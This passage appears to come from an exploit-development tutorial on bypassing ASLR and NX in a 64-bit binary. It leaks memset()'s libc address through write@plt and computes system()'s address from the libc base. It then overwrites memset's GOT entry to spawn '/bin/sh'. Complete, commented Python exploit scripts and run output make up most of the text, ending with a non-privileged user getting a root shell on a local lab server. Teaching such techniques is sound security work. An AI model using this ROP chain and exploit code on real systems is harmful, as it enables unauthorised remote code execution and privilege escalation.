   771: 000000000010c150    16 FUNC    GLOBAL DEFAULT   12 __wmemset_chk@@GLIBC_2.4
   838: 000000000008c5c0   247 FUNC    GLOBAL DEFAULT   12 memset@@GLIBC_2.2.5
  1383: 000000000008c5b0     9 FUNC    GLOBAL DEFAULT   12 __memset_chk@@GLIBC_2.3.4

memset()’s offset is at 0x8c5c0. Subtracting this from the leaked memset()’s address will give us libc’s base address.

To find the address of any library function, we just do the reverse and add the function’s offset to libc’s base address. So to find system()’s address, we get its offset from libc.so.6, and add it to libc’s base address.

Here’s our modified exploit that leaks memset()’s address, calculates libc’s base address, and finds the address of system():

# ./poc.py
#!/usr/bin/env python

from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret

buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# keep socket open so gdb doesn't get a SIGTERM
while True:
    s.recv(1024)

And here it is in action:

# ./poc.py
Enter input:
Recv:
memset() is at 0x7f9d206e45c0
libc base is 0x7f9d20658000
system() is at 0x7f9d2069e640

Now that we can get any library function address, we can do a ret2libc to complete the exploit. We’ll overwrite memset()’s GOT entry with the address of system(), so that when we trigger a call to memset(), it will call system(“/bin/sh”) instead. Here’s what we need to do:

  1. Overwrite memset()’s GOT entry with the address of system() using read@plt.
  2. Write “/bin/sh” somewhere in memory using read@plt. We’ll use 0x601000 since it’s a writable location with a static address.
  3. Set RDI to the location of “/bin/sh” and return to system().

Here’s the final exploit:

#!/usr/bin/env python

import telnetlib
from socket import *
from struct import *

write_plt  = 0x400540            # address of write@plt
read_plt   = 0x400580            # address of read@plt
memset_plt = 0x400570            # address of memset@plt
memset_got = 0x601030            # memset()'s GOT entry
memset_off = 0x08c5c0            # memset()'s offset in libc.so.6
system_off = 0x046640            # system()'s offset in libc.so.6
pop3ret    = 0x4006a1            # gadget to pop rdi; pop rsi; pop rdx; ret
writeable  = 0x601000            # location to write "/bin/sh" to

# leak memset()'s libc address using write@plt
buf = ""
buf += "A"*168                  # padding to RIP's offset
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x1)          # stdout
buf += pack("<Q", memset_got)   # address to read from
buf += pack("<Q", 0x8)          # number of bytes to write to stdout
buf += pack("<Q", write_plt)    # return to write@plt

# payload for stage 1: overwrite memset()'s GOT entry using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # stdin
buf += pack("<Q", memset_got)   # address to write to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 2: read "/bin/sh" into 0x601000 using read@plt
buf += pack("<Q", pop3ret)      # pop args into registers
buf += pack("<Q", 0x0)          # junk
buf += pack("<Q", writeable)    # location to write "/bin/sh" to
buf += pack("<Q", 0x8)          # number of bytes to read from stdin
buf += pack("<Q", read_plt)     # return to read@plt

# payload for stage 3: set RDI to location of "/bin/sh", and call system()
buf += pack("<Q", pop3ret)      # pop rdi; ret
buf += pack("<Q", writeable)    # address of "/bin/sh"
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", 0x1)          # junk
buf += pack("<Q", memset_plt)   # return to memset@plt which is actually system() now

s = socket(AF_INET, SOCK_STREAM)
s.connect(("127.0.0.1", 2323))

# stage 1: overwrite RIP so we return to write@plt to leak memset()'s libc address
print s.recv(1024)              # "Enter input" prompt
s.send(buf + "\n")              # send buf to overwrite RIP
print s.recv(1024)              # receive server reply
d = s.recv(1024)[-8:]           # we returned to write@plt, so receive the leaked memset() libc address 
                                # which is the last 8 bytes in the reply

memset_addr = unpack("<Q", d)
print "memset() is at", hex(memset_addr[0])

libc_base = memset_addr[0] - memset_off
print "libc base is", hex(libc_base)

system_addr = libc_base + system_off
print "system() is at", hex(system_addr)

# stage 2: send address of system() to overwrite memset()'s GOT entry
print "sending system()'s address", hex(system_addr)
s.send(pack("<Q", system_addr))

# stage 3: send "/bin/sh" to writable location
print "sending '/bin/sh'"
s.send("/bin/sh")

# get a shell
t = telnetlib.Telnet()
t.sock = s
t.interact()

I’ve commented the code heavily, so hopefully that will explain what’s going on. If you’re still a bit confused, attach gdb to socat and step through the process. For good measure, let’s run the binary as the root user, and run the exploit as a non-priviledged user:

koji@pwnbox:/root/work$ whoami
koji
koji@pwnbox:/root/work$ ./poc.py
Enter input:
Recv:
memset() is at 0x7f57f50015c0
libc base is 0x7f57f4f75000
system() is at 0x7f57f4fbb640
+ sending system()'s address 0x7f57f4fbb640
+ sending '/bin/sh'
whoami
root

Got a root shell and we bypassed ASLR, and NX!

We’ve looked at one way to bypass ASLR by leaking an address in the GOT. There are other ways to do it, and I refer you to the ASLR Smack & Laugh Reference for some interesting reading. Before I end off, you may have noticed that you need to have the correct version of libc to subtract an offset from the leaked address in order to get libc’s base address. If you don’t have access to the target’s version of libc, you can attempt to identify it using libc-database. Just pass it the leaked address and hopefully, it will identify the libc version on the target, which will allow you to get the correct offset of a function.